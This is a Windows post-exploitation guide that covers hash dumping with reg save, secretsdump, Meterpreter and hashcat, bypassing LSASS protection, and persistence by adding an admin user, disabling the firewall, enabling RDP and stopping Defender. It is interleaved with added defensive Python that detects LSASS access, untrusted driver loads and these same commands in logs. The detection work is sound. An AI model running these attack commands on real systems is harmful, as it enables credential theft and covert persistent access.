This guide covers how to establish better persistence on systems. It is a linear guide: from top to bottom, these are good practices to apply in order. All of these modules apply AFTER ACHIEVING ADMINISTRATOR ACCESS.
Dumping Hashes
After gaining Administrator access on a Windows computer we can dump hashes to open up the network to further attacks.
We can also dump the hashes locally from the registry hives. This only requires transferring the SYSTEM, SAM and SECURITY hive files to our local machine, using whatever file transfer method is most convenient.
reg.exe save hklm\system c:\Users\Administrator\system
reg.exe save hklm\security c:\Users\Administrator\security
reg.exe save hklm\sam c:\Users\Administrator\sam
Transfer them to our attacking machine and run secretsdump.py against the three files:
secretsdump.py -sam sam -system system -security security LOCAL
Method 3: Meterpreter
Use the following modules:
hashdump
use post/windows/gather/cachedump
Cracking NTLMv1 Hashes
Note: hashcat mode 1000 is the NT (NTLM) hash mode for hashes dumped from the SAM; NTLMv1 challenge-response hashes captured on the network use mode 5500 instead.
hashcat -m 1000 <hash> rockyou.txt
Cracking Cached Domain Credentials
To crack them with hashcat, each hash must be in the following format:
$DCC2$10240#username#hash
Meterpreter's cachedump output cannot be used in hashcat directly, but reformatting it is easy (10240 is the PBKDF2 iteration count Windows uses for cached DCC2 credentials).
Windows has a protection against dumping hashes from LSASS: LSA can run as a Protected Process Light (PPL). Processes run at different protection levels, and a process cannot open a handle to one at a higher protection level, even as Administrator, so we cannot touch LSASS memory.
Typical error:
mimikatz # sekurlsa::logonpasswords
ERROR .... Handle on mmory (0x000000005)
Bypassing PPL
PPL is enforced by the kernel, so bypassing it requires code running at kernel level. We will do this by making use of the administrator privilege SeLoadDriverPrivilege, which allows loading a driver.
There will be times when mimikatz gets picked up. We should first try to disable Windows Defender, but if an antivirus keeps blocking it we can dump the hashes offline instead. This is much the same as the hive approach above: create a memory dump of the LSASS process and transfer it off the box.
Transfer the DMP file to our attacking Windows machine.
Do the same for other processes you have access to; their memory can hint at what else needs to be disabled.
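The defender's side of the PPL and LSASS-dump discussion above, as an added example that is not part of the original notes: Sysmon Event ID 10 (ProcessAccess) records which process opened a handle to lsass.exe and with what access mask, and Event ID 6 (DriverLoad) records drivers entering the kernel, which is the route an attacker holding SeLoadDriverPrivilege takes. The field names follow Sysmon's schema; the event values, paths and the allowlist are constructed for illustration and the allowlist is an assumption to be tuned per environment.

```python
"""Spot LSASS memory access and suspicious kernel driver loads in Sysmon telemetry.

Added example, not from the original notes. All events below are constructed;
field names follow Sysmon's Event 10 / Event 6 schema, the paths are invented.
"""
import re
from dataclasses import dataclass

PROCESS_VM_READ = 0x0010  # winnt.h access right needed to read another process's memory

# Images that open lsass.exe as part of normal operation. Assumption: this short
# list is only a starting point; build yours from a baseline of your own fleet.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Drivers should come from the system driver store; these directories are user-writable.
USER_WRITABLE_DIR = re.compile(r"\\(?:users|temp|programdata)\\", re.I)


@dataclass
class Finding:
    event_id: int
    reason: str
    detail: str


def check_process_access(ev):
    """Event 10: a non-allowlisted process obtained read access to lsass.exe."""
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return None
    source = ev.get("SourceImage", "").lower()
    if source in LSASS_ACCESS_ALLOWLIST:
        return None
    granted = int(ev.get("GrantedAccess", "0x0"), 16)
    # Any credential dumper needs VM_READ; masks such as 0x1FFFFF (all access) include it.
    if granted & PROCESS_VM_READ:
        return Finding(10, "lsass memory read", f"{source} GrantedAccess={ev['GrantedAccess']}")
    return None


def check_driver_load(ev):
    """Event 6: a driver that is unsigned, fails validation, or lives in a user-writable path."""
    image = ev.get("ImageLoaded", "")
    signed_ok = (ev.get("Signed", "false").lower() == "true"
                 and ev.get("SignatureStatus", "").lower() == "valid")
    if not signed_ok:
        return Finding(6, "untrusted driver signature",
                       f"{image} SignatureStatus={ev.get('SignatureStatus', 'n/a')}")
    if USER_WRITABLE_DIR.search(image):
        return Finding(6, "driver loaded from user-writable path", image)
    return None


def lsa_protection_enabled(lsa_values):
    """Mitigation check: RunAsPPL under the Control\\Lsa key (value 1 or 2) enables LSA protection."""
    return lsa_values.get("RunAsPPL", 0) in (1, 2)


def scan(events):
    """Run the relevant check for each event and collect findings in order."""
    findings = []
    for ev in events:
        eid = ev.get("EventID")
        f = check_process_access(ev) if eid == 10 else check_driver_load(ev) if eid == 6 else None
        if f:
            findings.append(f)
    return findings


# Constructed sample telemetry: one benign lsass open, a dumper, Task Manager
# (a classic false positive worth knowing), a stock driver, and two bad drivers.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\dump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\disk.sys",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 6, "ImageLoaded": r"C:\Users\Public\x.sys",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\Temp\y.sys",
     "Signed": "false", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"Event {f.event_id}: {f.reason} -> {f.detail}")
```

The Task Manager hit shows why the allowlist matters: legitimate tools also request VM_READ on lsass, so the access mask alone is a trigger for review, not proof of dumping. The driver checks pair with the PPL bypass point above: with LSA protection on, the attacker's remaining option is kernel code, and a driver load from a user-writable directory or with a failed signature is the artifact that leaves behind.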
Persistence
Adding Administrator Users
net user lyethar pass123 /add
net localgroup Administrators lyethar /add
Then we can use psexec to log in.
Disable Firewall
NetSh Advfirewall set allprofiles state off
Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
Disabling Windows Defender
Run the following command to disable Windows Defender:
sc stop WinDefend
To make sure that Windows Defender is stopped, run this command:
sc query WinDefend
To enable Windows Defender again, run the following command:
sc start WinDefend
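Every command in the Dumping Hashes section (reg save of the SAM, SYSTEM and SECURITY hives) and in the Persistence section (net user /add, net localgroup Administrators /add, the netsh firewall changes, the fDenyTSConnections registry edit, sc stop WinDefend) lands in process-creation telemetry. The following detector, an added example that is not part of the original notes, runs the corresponding rules over constructed log lines; the "host user CommandLine=..." line shape is an assumption standing in for your Sysmon Event 1 or Security 4688 export.

```python
"""Flag hive dumping and persistence command lines in process-creation logs.

Added example, not part of the original notes. The patterns match the commands
shown in the notes plus common variants (reg vs reg.exe, net vs net1, any case).
The log line shape "host user CommandLine=..." is constructed; adapt LINE_RE.
"""
import re
from collections import defaultdict

RULES = [
    ("registry hive dump",
     re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(?:sam|system|security)\b", re.I)),
    ("local user created",
     re.compile(r"\bnet(?:1|\.exe)?\s+user\s+\S+(?:\s+\S+)?\s+/add\b", re.I)),
    ("local admin group modified",
     re.compile(r"\bnet(?:1|\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("firewall disabled",
     re.compile(r"\bnetsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b", re.I)),
    ("rdp enabled via registry",
     re.compile(r"\breg(?:\.exe)?\s+add\b.*terminal server.*fDenyTSConnections.*/d\s+0\b", re.I)),
    ("rdp firewall rule opened",
     re.compile(r"\bnetsh\s+advfirewall\s+firewall\s+set\s+rule\s+group=\"?remote desktop\"?\s+new\s+enable=yes\b", re.I)),
    ("defender service stopped",
     re.compile(r"\bsc(?:\.exe)?\s+stop\s+windefend\b", re.I)),
]

# Constructed line shape: "<host> <user> CommandLine=<command line>".
LINE_RE = re.compile(r"^(?P<host>\S+)\s+(?P<user>\S+)\s+CommandLine=(?P<cmd>.*)$")


def classify(cmdline):
    """Return the names of every rule matched by one command line."""
    return [name for name, pat in RULES if pat.search(cmdline)]


def scan_log(lines):
    """Parse log lines and return {host: [(user, rule name, command line), ...]}."""
    alerts = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line; a real pipeline would count these
        for name in classify(m["cmd"]):
            alerts[m["host"]].append((m["user"], name, m["cmd"]))
    return dict(alerts)


def summarize(alerts):
    """Distinct technique names per host; several distinct hits on one host is the strong signal."""
    return {host: sorted({name for _, name, _ in hits}) for host, hits in alerts.items()}


# Constructed sample lines: WS01 replays the notes' sequence, WS02 is benign admin noise.
SAMPLE_LINES = [
    r"WS01 CORP\jdoe CommandLine=reg.exe save hklm\sam c:\Users\Administrator\sam",
    r"WS01 CORP\jdoe CommandLine=reg.exe save hklm\system c:\Users\Administrator\system",
    r"WS01 CORP\jdoe CommandLine=net user lyethar pass123 /add",
    r"WS01 CORP\jdoe CommandLine=net localgroup Administrators lyethar /add",
    r"WS01 CORP\jdoe CommandLine=NetSh Advfirewall set allprofiles state off",
    r'WS01 CORP\jdoe CommandLine=reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r'WS01 CORP\jdoe CommandLine=netsh advfirewall firewall set rule group="remote desktop" new enable=Yes',
    r"WS01 CORP\jdoe CommandLine=sc stop WinDefend",
    r"WS02 CORP\svc_backup CommandLine=reg.exe query hklm\software\microsoft\windows\currentversion",
    r"WS02 CORP\svc_backup CommandLine=net user",
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LINES)
    for host, names in summarize(hits).items():
        print(f"{host}: {len(names)} distinct techniques: {', '.join(names)}")
```

Each rule on its own is noisy (help desks add local users, admins toggle RDP), which is why summarize counts distinct techniques per host: a single host running a hive dump, a new local admin, a firewall disable and a Defender stop within one session is the pattern the notes above describe, and that chain is what should page someone.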